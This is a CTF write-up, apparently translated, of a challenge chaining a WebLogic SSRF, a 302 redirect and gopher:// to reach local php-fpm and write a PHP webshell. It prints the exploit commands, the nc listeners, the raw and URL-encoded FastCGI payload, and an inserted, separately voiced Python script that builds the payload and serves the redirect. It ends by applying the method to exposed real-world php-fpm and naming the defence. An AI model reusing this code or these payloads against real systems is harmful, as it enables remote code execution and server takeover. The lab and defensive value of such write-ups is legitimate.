Three White Hats: You from the Stars (1) writeup

Source: Internet
Author: User
Tags: gopher
Three White Hats, "You from the Stars (1)": this is my first proper writeup for Three White Hats. It was not easy, and I stepped on many pitfalls along the way...

0x00 Challenge

I have lost You from the Stars; I may have to use everything I have to get you back. (I couldn't get past two sentences of story. OK, I admit it: this is the first challenge of a penetration series.)

  • Tip 1: SSRF
  • Tip 2: Maybe you can scan for directories?
  • Tip 3: the /console/ directory will be helpful to you
0x01 WP: Discuz X3.2

Opening the page, the first thing you see is a Discuz X3.2 site. I checked: the latest version had been released only on June 1, and the several holes I could find online had all been fixed. So I spent a night searching, and then got Hint 1: SSRF.

Searching for Chaitin's (长亭) SSRF write-ups turned up an article:

Https://blog.chaitin.com/gopher-attack-surfaces/

It mentions that Discuz X3.2 has an SSRF, and that SSRF plus the gopher protocol can be used to getshell.

However, this exploitation method has an important precondition: PHP on the server must have the gopher wrapper enabled, and PHP must be running under FastCGI.

After a round of directory scanning we found info.php; its phpinfo() output showed that the gopher wrapper was not enabled.

After idling for a while, Hint 3 appeared: /console/

That led to a WebLogic instance...

WebLogic

The hole here is simple; a quick search turned up:

WooYun: CCTV SSRF can snoop on the intranet (WebLogic SSRF case)

Testing confirmed it.

Better still, it can be chained with the gopher protocol to getshell.

Following the Chaitin blog article, test first.

Construct on the server:

#!php
 

Then listen on port 2333 on the server:

#!bash
nc -lvv 2333

Submit the request:

#!bash
http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://<server ip>/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=

The listener received "test", which confirms that the gopher protocol is usable here.

Now construct the real payload.

There is an important article on exploiting FastCGI:

http://zone.wooyun.org/content/1060

Generate the payload with the exp from that article:

#!bash
./fcgi_exp system 127.0.0.1 2333 /opt/discuz/info.php "echo ‘$_GET[x]($_POST[xx]);’ > /opt/discuz/data/test.php"

Listen on port 2333 and save what arrives:

#!bash
nc -lvv 2333 > 1.txt

Now look at 1.txt:

#!bash
<user@host>:/home/wwwroot/default/fcgi_exp# xxd 1.txt
0000000: 0101 0001 0008 0000 0001 0000 0000 0000  ................
0000010: 0104 0001 0112 0600 0f14 5343 5249 5054  ..........SCRIPT
0000020: 5f46 494c 454e 414d 452f 6f70 742f 6469  _FILENAME/opt/di
0000030: 7363 757a 2f69 6e66 6f2e 7068 700d 0144  scuz/info.php..D
0000040: 4f43 554d 454e 545f 524f 4f54 2f0f 1053  OCUMENT_ROOT/..S
0000050: 4552 5645 525f 534f 4654 5741 5245 676f  ERVER_SOFTWAREgo
0000060: 202f 2066 6367 6963 6c69 656e 7420 0b09   / fcgiclient ..
0000070: 5245 4d4f 5445 5f41 4444 5231 3237 2e30  REMOTE_ADDR127.0
0000080: 2e30 2e31 0f08 5345 5256 4552 5f50 524f  .0.1..SERVER_PRO
0000090: 544f 434f 4c48 5454 502f 312e 310e 0343  TOCOLHTTP/1.1..C
00000a0: 4f4e 5445 4e54 5f4c 454e 4754 4831 3033  ONTENT_LENGTH103
00000b0: 0e04 5245 5155 4553 545f 4d45 5448 4f44  ..REQUEST_METHOD
00000c0: 504f 5354 095b 5048 505f 5641 4c55 4561  POST.[PHP_VALUEa
00000d0: 6c6c 6f77 5f75 726c 5f69 6e63 6c75 6465  llow_url_include
00000e0: 203d 204f 6e0a 6469 7361 626c 655f 6675   = On.disable_fu
00000f0: 6e63 7469 6f6e 7320 3d20 0a73 6166 655f  nctions = .safe_
0000100: 6d6f 6465 203d 204f 6666 0a61 7574 6f5f  mode = Off.auto_
0000110: 7072 6570 656e 645f 6669 6c65 203d 2070  prepend_file = p
0000120: 6870 3a2f 2f69 6e70 7574 0000 0000 0000  hp://input......
0000130: 0104 0001 0000 0000 0105 0001 0067 0100  .............g..
0000140: 3c3f 7068 7020 7379 7374 656d 2827 6563  <?php system('ec
0000150: 686f 20e2 8098 5b78 5d28 5b78 785d 293b  ho ...[x]([xx]);
0000160: e280 9920 3e20 2f6f 7074 2f64 6973 6375  ... > /opt/discu
0000170: 7a2f 6461 7461 2f74 6573 742e 7068 7027  z/data/test.php'
0000180: 293b 6469 6528 272d 2d2d 2d2d 3076 6364  );die('-----0vcd
0000190: 6233 346f 6a75 3039 6238 6664 2d2d 2d2d  b34oju09b8fd----
00001a0: 2d0a 2729 3b3f 3e00                      -.');?>.

This raw FastCGI stream then has to be URL-encoded so it can travel inside a gopher:// URL:

#!python
>>> f = open('1.txt')
>>> ff = f.read()
>>> from urllib import quote
>>> quote(ff)
'%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%12%06%00%0F%14SCRIPT_FILENAME/opt/discuz/info.php%0D%01DOCUMENT_ROOT/%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH103%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%00%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00g%01%00%3C%3Fphp%20system%28%27echo%20%E2%80%98%5Bx%5D%28%5Bxx%5D%29%3B%E2%80%99%20%3E%20/opt/discuz/data/test.php%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00'

Construct gopher.php:

#!php

Request:

#!bash
http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip/gopher.php&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

Discuz's data directory is writable by default, so the write should have worked, but the webshell never appeared and I could not figure out why at the time, so the shell was not reproduced. One cause is visible in the dump above: the command was passed to fcgi_exp inside double quotes, so the shell expanded $_GET[x] and $_POST[xx] to nothing before the payload was built, and what reached php-fpm writes ‘[x]([xx]);’ (with U+2018/U+2019 curly quotes, not ASCII quotes) into test.php rather than a working one-liner.
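To make the three steps above concrete (build the FastCGI stream, percent-encode it into a gopher:// URL, hand that URL out through a 302), here is an added example in Python 3. It is not the fcgi_exp tool from the WooYun article, not the Chaitin code and not the author's gopher.php; it rebuilds the same bytes as the xxd dump from the FastCGI record format (version 1; record types BEGIN_REQUEST=1, PARAMS=4, STDIN=5; 8-byte padding). The target 127.0.0.1:9000, the PHP_VALUE text and the command string come from the page; the function names, the redirect server and its port 8000 are assumptions made for illustration.

```python
"""Rebuild the page's FastCGI stream and wrap it for the 302 -> gopher:// step.

Added example; not the page's fcgi_exp, gopher.php or Chaitin's code.
Assumed: function names, the redirect server and port 8000.
"""
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import quote

FCGI_VERSION = 1
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
FCGI_RESPONDER = 1


def fcgi_record(rec_type, content, request_id=1):
    """One FCGI record: 8-byte header, content, zero padding up to 8 bytes.
    The 06 and 01 padding bytes in the dump fall out of this rule."""
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBx", FCGI_VERSION, rec_type, request_id,
                         len(content), padding)
    return header + content + b"\x00" * padding


def fcgi_name_value(name, value):
    """FCGI name-value pair: 1-byte lengths below 128, otherwise 4 bytes with
    the top bit set. The dump only needs the short form (0f 14, 09 5b, ...)."""
    def length(n):
        return bytes([n]) if n < 128 else struct.pack(">I", n | 0x80000000)
    name, value = name.encode(), value.encode()
    return length(len(name)) + length(len(value)) + name + value


def fcgi_request(params, stdin, request_id=1, end_stdin=False):
    """BEGIN_REQUEST, PARAMS, empty PARAMS (end of params), STDIN.
    The dump on the page stops after the STDIN record; a spec-conformant
    client also sends an empty STDIN record, which end_stdin=True adds."""
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)  # role, flags, reserved
    stream = fcgi_record(FCGI_BEGIN_REQUEST, begin, request_id)
    stream += fcgi_record(FCGI_PARAMS,
                          b"".join(fcgi_name_value(k, v) for k, v in params),
                          request_id)
    stream += fcgi_record(FCGI_PARAMS, b"", request_id)
    stream += fcgi_record(FCGI_STDIN, stdin, request_id)
    if end_stdin:
        stream += fcgi_record(FCGI_STDIN, b"", request_id)
    return stream


# The PHP that fcgi_exp fed to php-fpm's stdin, exactly as the dump shows it:
# "[x]([xx])" because the shell had already expanded $_GET / $_POST away,
# and the quotes around it are U+2018 / U+2019, not ASCII single quotes.
PAGE_PHP_CODE = ("<?php system('echo \u2018[x]([xx]);\u2019 > /opt/discuz/data/test.php');"
                 "die('-----0vcdb34oju09b8fd-----\n');?>")

# auto_prepend_file = php://input makes PHP include the request body (the
# STDIN record) before info.php runs, which is what executes PAGE_PHP_CODE.
PAGE_PHP_VALUE = ("allow_url_include = On\n"
                  "disable_functions = \n"
                  "safe_mode = Off\n"
                  "auto_prepend_file = php://input")


def page_payload(script="/opt/discuz/info.php", code=PAGE_PHP_CODE):
    """The 424-byte stream captured in the page's 1.txt."""
    body = code.encode("utf-8")
    params = [
        ("SCRIPT_FILENAME", script),          # must be an existing .php file
        ("DOCUMENT_ROOT", "/"),
        ("SERVER_SOFTWARE", "go / fcgiclient "),
        ("REMOTE_ADDR", "127.0.0.1"),
        ("SERVER_PROTOCOL", "HTTP/1.1"),
        ("CONTENT_LENGTH", str(len(body))),   # php-fpm reads this many stdin bytes
        ("REQUEST_METHOD", "POST"),
        ("PHP_VALUE", PAGE_PHP_VALUE),
    ]
    return fcgi_request(params, body)


def gopher_url(stream, host="127.0.0.1", port=9000):
    """gopher://host:port/_<payload>: '_' is the selector type the client
    strips; the rest is percent-decoded once and written to the socket raw,
    so the binary stream is percent-encoded exactly once here."""
    return f"gopher://{host}:{port}/_{quote(stream)}"


class GopherRedirect(BaseHTTPRequestHandler):
    """Stand-in for the page's gopher.php: every GET gets a 302 whose Location
    is the gopher URL, so an SSRF that only accepts http:// up front but
    follows redirects ends up speaking FastCGI to 127.0.0.1:9000."""
    location = gopher_url(page_payload())

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", self.location)
        self.end_headers()


if __name__ == "__main__":
    # Assumed port; point the SSRF at http://<server ip>:8000/gopher.php
    HTTPServer(("0.0.0.0", 8000), GopherRedirect).serve_forever()
```

Running page_payload() through quote() reproduces the page's encoded string byte for byte, which is a useful self-check when rebuilding such a stream by hand: the two padding bytes (6 after PARAMS, 1 after STDIN) and CONTENT_LENGTH = len(body) are the places a hand-built payload usually goes wrong. Checking that the bytes still contain the literal $_GET before sending would have caught the shell-expansion pitfall described above.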

0x02 After the challenge

After finishing, I wanted to dig deeper into the underlying principle, and suddenly found that this challenge was in fact last year's HITCON quals web400, lalala.

http://kb.hitcon.org/post/131488130087/hitcon-ctf-2015-quals-web-%E5%87%BA%E9%A1%8C%E5%BF%83%E5%BE%97

The core idea of the whole challenge is to bypass the SSRF's scheme restriction with a 302 redirect, then use gopher through the SSRF to speak the local FastCGI protocol and achieve remote code execution.

In the real world, if PHP FastCGI is exposed to the public network, you can get a shell directly the same way.

php-fpm listens on port 9000 by default. Send a FastCGI request whose PHP_ADMIN_VALUE (the dump above uses PHP_VALUE) sets allow_url_include to On and adds auto_prepend_file = php://input; PHP then includes the request body before the target script runs, so the code sent as FastCGI stdin executes and can write a shell. The practical defence is not to expose php-fpm at all: listen on a unix socket, or bind 127.0.0.1 and restrict listen.allowed_clients.
